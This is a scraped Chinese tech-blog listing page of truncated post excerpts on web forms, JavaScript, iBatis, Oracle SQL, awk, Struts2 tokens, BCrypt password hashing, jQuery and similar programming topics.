原帖地址：http://www.iteye.com/topic/266705 form有2中方法把数据提交给服务器，get和post,分别说下吧。（一）get提交 1.首先说下客户端（浏览器）的form表单用get方法是如何将数据编码后提交给服务器端的吧。对于get方法来说，都是把数据串联在请求的url后面作为参数，如：http://localhost:
JS初学者必知的基础百合不是茶 js函数 js入门基础
JavaScript是网页的交互语言,实现网页的各种效果, JavaScript 是世界上最流行的脚本语言。 JavaScript 是属于 web 的语言，它适用于 PC、笔记本电脑、平板电脑和移动电话。 JavaScript 被设计为向 HTML 页面增加交互性。许多 HTML 开发者都不是程序员，但是 JavaScript 却拥有非常简单的语法。几乎每个人都有能力将小的
iBatis的分页分析与详解 bijian1013 java ibatis
分页是操作数据库型系统常遇到的问题。分页实现方法很多，但效率的差异就很大了。iBatis是通过什么方式来实现这个分页的了。查看它的实现部分，发现返回的PaginatedList实际上是个接口，实现这个接口的是PaginatedDataList类的对象，查看PaginatedDataList类发现，每次翻页的时候最
精通Oracle10编程SQL(15)使用对象类型 bijian1013 oracle 数据库 plsql
/* *使用对象类型 */ --建立和使用简单对象类型 --对象类型包括对象类型规范和对象类型体两部分。 --建立和使用不包含任何方法的对象类型 CREATE OR REPLACE TYPE person_typ1 as OBJECT( name varchar2(10),gender varchar2(4),birthdate date ); drop type p
【Linux命令二】文本处理命令awk bit1129 linux命令
awk是Linux用来进行文本处理的命令，在日常工作中，广泛应用于日志分析。awk是一门解释型编程语言，包含变量，数组，循环控制结构，条件控制结构等。它的语法采用类C语言的语法。 awk命令用来做什么？ 1.awk适用于具有一定结构的文本行，对其中的列进行提取信息 2.awk可以把当前正在处理的文本行提交给Linux的其它命令处理，然后把直接结构返回给awk 3.awk实际工
JAVA(ssh2框架)+Flex实现权限控制方案分析白糖_ java
目前项目使用的是Struts2+Hibernate+Spring的架构模式，目前已经有一套针对SSH2的权限系统，运行良好。但是项目有了新需求：在目前系统的基础上使用Flex逐步取代JSP，在取代JSP过程中可能存在Flex与JSP并存的情况，所以权限系统需要进行修改。【SSH2权限系统的实现机制】权限控制分为页面和后台两块：不同类型用户的帐号分配的访问权限是不同的，用户使
angular.forEach boyitech AngularJS AngularJS API angular.forEach
angular.forEach 描述: 循环对obj对象的每个元素调用iterator, obj对象可以是一个Object或一个Array. Iterator函数调用方法: iterator(value, key, obj), 其中obj是被迭代对象，key是obj的property key或者是数组的index，value就是相应的值啦. (此函数不能够迭代继承的属性.)
java-谷歌面试题-给定一个排序数组，如何构造一个二叉排序树 bylijinnan 二叉排序树
import java.util.LinkedList; public class CreateBSTfromSortedArray { /** * 题目:给定一个排序数组，如何构造一个二叉排序树 * 递归 */ public static void main(String[] args) { int[] data = { 1, 2, 3, 4,
action执行2次 Chen.H JavaScript jsp XHTML css Webwork
xwork 写道 <action name="userTypeAction" class="com.ekangcount.website.system.view.action.UserTypeAction"> <result name="ssss" type="dispatcher">
[时空与能量]逆转时空需要消耗大量能源 comsci 能源
无论如何,人类始终都想摆脱时间和空间的限制....但是受到质量与能量关系的限制,我们人类在目前和今后很长一段时间内,都无法获得大量廉价的能源来进行时空跨越..... 在进行时空穿梭的实验中,消耗超大规模的能源是必然
oracle的正则表达式(regular expression)详细介绍 daizj oracle 正则表达式
正则表达式是很多编程语言中都有的。可惜oracle8i、oracle9i中一直迟迟不肯加入，好在oracle10g中终于增加了期盼已久的正则表达式功能。你可以在oracle10g中使用正则表达式肆意地匹配你想匹配的任何字符串了。正则表达式中常用到的元数据(metacharacter)如下： ^ 匹配字符串的开头位置。 $ 匹配支付传的结尾位置。 *
报表工具与报表性能的关系 datamachine 报表工具 birt 报表性能润乾报表
在选择报表工具时，性能一直是用户关心的指标，但是，报表工具的性能和整个报表系统的性能有多大关系呢？要回答这个问题，首先要分析一下报表的处理过程包含哪些环节，哪些环节容易出现性能瓶颈，如何优化这些环节。一、报表处理的一般过程分析 1、用户选择报表输入参数后，报表引擎会根据报表模板和输入参数来解析报表，并将数据计算和读取请求以SQL的方式发送给数据库。 2、
初一上学期难记忆单词背诵第一课 dcj3sjt126com word english
what 什么 your 你 name 名字 my 我的 am 是 one 一 two 二 three 三 four 四 five 五 class 班级，课 six 六 seven 七 eight 八 nince 九 ten 十 zero 零 how 怎样 old 老的 eleven 十一 twelve 十二 thirteen
我学过和准备学的各种技术 dcj3sjt126com 技术
语言VB https://msdn.microsoft.com/zh-cn/library/2x7h1hfk.aspxJava http://docs.oracle.com/javase/8/C# https://msdn.microsoft.com/library/vstudioPHP http://php.net/manual/en/Html
struts2中token防止重复提交表单蕃薯耀重复提交表单 struts2中token
struts2中token防止重复提交表单 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月12日 11:52:32 星期日 ht
线性查找二维数组 hao3100590 二维数组
1.算法描述有序（行有序，列有序，且每行从左至右递增，列从上至下递增）二维数组查找，要求复杂度O(n) 2.使用到的相关知识：结构体定义和使用，二维数组传递（http://blog.csdn.net/yzhhmhm/article/details/2045816） 3.使用数组名传递这个的不便之处很明显，一旦确定就是不能设置列值 //使
spring security 3中推荐使用BCrypt算法加密密码 jackyrong Spring Security
spring security 3中推荐使用BCrypt算法加密密码了，以前使用的是md5， Md5PasswordEncoder 和 ShaPasswordEncoder，现在不推荐了，推荐用bcrpt Bcrpt中的salt可以是随机的，比如： int i = 0; while (i < 10) { String password = "1234
学习编程并不难,做到以下几点即可! lampcy java html 编程语言
不论你是想自己设计游戏，还是开发iPhone或安卓手机上的应用，还是仅仅为了娱乐，学习编程语言都是一条必经之路。编程语言种类繁多，用途各异，然而一旦掌握其中之一，其他的也就迎刃而解。作为初学者，你可能要先从Java或HTML开始学，一旦掌握了一门编程语言，你就发挥无穷的想象，开发各种神奇的软件啦。 1、确定目标学习编程语言既充满乐趣，又充满挑战。有些花费多年时间学习一门编程语言的大学生到
架构师之mysql----------------用group+inner join,left join ,right join 查重复数据（替代in) nannan408 right join
1.前言。如题。 2.代码 (1)单表查重复数据,根据a分组 SELECT m.a,m.b, INNER JOIN （select a,b,COUNT(*) AS rank FROM test.`A` A GROUP BY a HAVING rank>1 )k ON m.a=k.a （2）多表查询，使用改为le
jQuery选择器小结 VS 节点查找（附css的一些东西） Everyday都不同 jquery css name选择器追加元素查找节点
最近做前端页面，频繁用到一些jQuery的选择器，所以特意来总结一下：测试页面： <html> <head> <script src="jquery-1.7.2.min.js"></script> <script> /*$(function() { $(documen
关于EXT tntxia ext
ExtJS是一个很不错的Ajax框架，可以用来开发带有华丽外观的富客户端应用，使得我们的b/s应用更加具有活力及生命力。ExtJS是一个用 javascript编写，与后台技术无关的前端ajax框架。因此，可以把ExtJS用在.Net、Java、Php等各种开发语言开发的应用中。 ExtJs最开始基于YUI技术，由开发人员Jack
一个MIT计算机博士对数学的思考 xjnine Math
在过去的一年中，我一直在数学的海洋中游荡，research进展不多，对于数学世界的阅历算是有了一些长进。为什么要深入数学的世界？作为计算机的学生，我没有任何企图要成为一个数学家。我学习数学的目的，是要想爬上巨人的肩膀，希望站在更高的高度，能把我自己研究的东西看得更深广一些。说起来，我在刚来这个学校的时候，并没有预料到我将会有一个深入数学的旅程。我的导师最初希望我去做的题目，是对appe